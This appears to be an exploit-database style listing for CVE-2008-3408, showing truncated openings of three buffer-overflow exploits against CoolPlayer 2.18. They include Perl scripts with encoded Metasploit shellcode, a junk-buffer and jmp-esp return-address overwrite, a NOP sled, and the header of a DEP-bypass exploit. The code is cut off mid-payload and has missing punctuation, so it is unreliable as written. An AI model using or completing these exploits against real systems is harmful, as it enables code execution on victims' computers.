CVE-2008-3408

#!/usr/bin/perl # k`sOSe - 07/29/2008 use warnings; use strict; # wwwmetasploitcom # EXITFUNC=seh, CMD=c:\WINDOWS\system32\calcexe # [*] x86/shikata_ga_nai succeeded, final size 169 my $shellcode = "\xd9\xca\xd9\x74\x24\xf4\x5e\xb8\xf5\x65\x2d\xfb\x31\xc9\xb1" "\x24\x31\x46\x19\x83\xee\xfc\x03\x46\x15\x17\x90\xd1\x13\x93" "\x5b\ ...

#!/usr/bin/perl # Versions affected: 218 # Tested on: Windows XP Pro SP2 # Author: data$hack # Usage: explpl my $file= "exs3m3u"; my $junk= "A" x 223; my $eip = pack('V',0x7C836940); #jmp esp from kernel my $shellcode = "\x90" x 10; $shellcode = $shellcode "\x33\xc9\xb8\xa2\xe0\xe4\x44\xb1\x33\xda\ ...

# Exploit Title: CoolPlayer 218 DEP Bypass # Date: January 2, 2011 # Author: Blake # Version: 218 # Tested on: Windows XP SP3 running in Virtualbox # Uses SetProcessDEPPolicy() to disable DEP for the process # Thanks to mr_me for the encouragement # Exploit-DB Notes: May not work on all Win XP SP3 machines print "\n============================" ...